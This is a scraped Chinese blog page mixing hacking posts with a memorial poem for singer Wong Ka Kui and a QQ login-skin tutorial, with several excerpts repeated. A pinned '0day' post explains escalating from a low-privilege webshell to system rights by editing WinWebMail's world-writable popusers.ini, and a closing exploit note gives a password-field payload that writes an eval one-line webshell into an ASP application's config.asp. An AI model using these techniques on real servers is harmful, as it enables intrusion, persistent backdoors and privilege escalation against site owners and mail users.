Lan3a Blog
欢迎各位朋友的到来,谢谢你们的支持啦!
欢迎各位朋友的到来,谢谢你们的支持啦!
[置顶] 0day发布网址
一、WinWebMail程序安装为系统服务,程序一般是在admin权限下运行的,而服务程序emsvr.exe是在system权限下运行的,这样,我们就可以通过这个漏洞来提升权限了。假设我们得到了一个低权的WebShell,有修改权限,服务器安装有WinWebMail,我们只要能够修改其中的opusers.ini文件,就可以利用这个漏洞提升权限了,加用户、开端口就随你了。
在硬盘分区为NTFS格式下,WinWebMail会要求安装目录为everyone可写,这是因为它是Web服务式的邮件系统,需要通过ASP文件读写用户邮箱,也就是对应于某个用户名的文件夹,而普通的ASP程序解析权限很低,所以必须得让WinWebMail所在的目录拥有everyone可写权限,不然程序会无法正常读写这些用户文件夹的。在FAT32格式下就更不用说了,我们可以随意修改popusers.ini文件,从而溢出获得更高权限了。
<阅读全文>
在硬盘分区为NTFS格式下,WinWebMail会要求安装目录为everyone可写,这是因为它是Web服务式的邮件系统,需要通过ASP文件读写用户邮箱,也就是对应于某个用户名的文件夹,而普通的ASP程序解析权限很低,所以必须得让WinWebMail所在的目录拥有everyone可写权限,不然程序会无法正常读写这些用户文件夹的。在FAT32格式下就更不用说了,我们可以随意修改popusers.ini文件,从而溢出获得更高权限了。
<阅读全文>
六月,骄阳似火的季节里.
你到来, 你走开.
每当六月到来的时候,天空总会飘起细细的雨
我知道是你来了
亲爱的你,祝你愉快.
六月,曾经阴霾的岁月里.
你走开, 不回来
六月开始迎接你,六月底你却独自睡去
你可知道我多么想念你
亲爱的你,还好吗?你找到了那片更开放,更和平,更美的地方吗?
那里是你真正的天堂吗?
岁月无声,离开你已经十七载,但你,却永远年轻
在我们的天空里,再多的时间也带不走心中的那个你.
家驹生日快乐
你到来, 你走开.
每当六月到来的时候,天空总会飘起细细的雨
我知道是你来了
亲爱的你,祝你愉快.
六月,曾经阴霾的岁月里.
你走开, 不回来
六月开始迎接你,六月底你却独自睡去
你可知道我多么想念你
亲爱的你,还好吗?你找到了那片更开放,更和平,更美的地方吗?
那里是你真正的天堂吗?
岁月无声,离开你已经十七载,但你,却永远年轻
在我们的天空里,再多的时间也带不走心中的那个你.
家驹生日快乐
Flash Player文件
原文来自:Qq武林
地址:http://www.qq50.org/a/QQjiqiao/20100609/84.html
首先我来总结下自定义QQ登录界面背景有哪些好处:
1,在美观上是有绝对优势的
2,可以很快辨别是否中了QQ木马,因为大多QQ木马都是
通过假的登录框实现盗号的,一旦我们发现登录界面不对,
即可知道中了QQ木马
条件:QQ版本必须是2010版本
工具:1,Fireworks 8(这个工具比较大,大家可以去网上下载)
2,通用文件打包解包工具(在后面打包上来,直接在本站下载)
Fireworks 8 主要用来处理图片的,我们用通用文件打包解包工具
<阅读全文>
地址:http://www.qq50.org/a/QQjiqiao/20100609/84.html
首先我来总结下自定义QQ登录界面背景有哪些好处:
1,在美观上是有绝对优势的
2,可以很快辨别是否中了QQ木马,因为大多QQ木马都是
通过假的登录框实现盗号的,一旦我们发现登录界面不对,
即可知道中了QQ木马
条件:QQ版本必须是2010版本
工具:1,Fireworks 8(这个工具比较大,大家可以去网上下载)
2,通用文件打包解包工具(在后面打包上来,直接在本站下载)
Fireworks 8 主要用来处理图片的,我们用通用文件打包解包工具
<阅读全文>
影响版本:=>2.8 商业版
攻击利用:
登陆后台,点击修改密码---新密码设置为
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
攻击利用:
登陆后台,点击修改密码---新密码设置为
1":eval request("h")’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
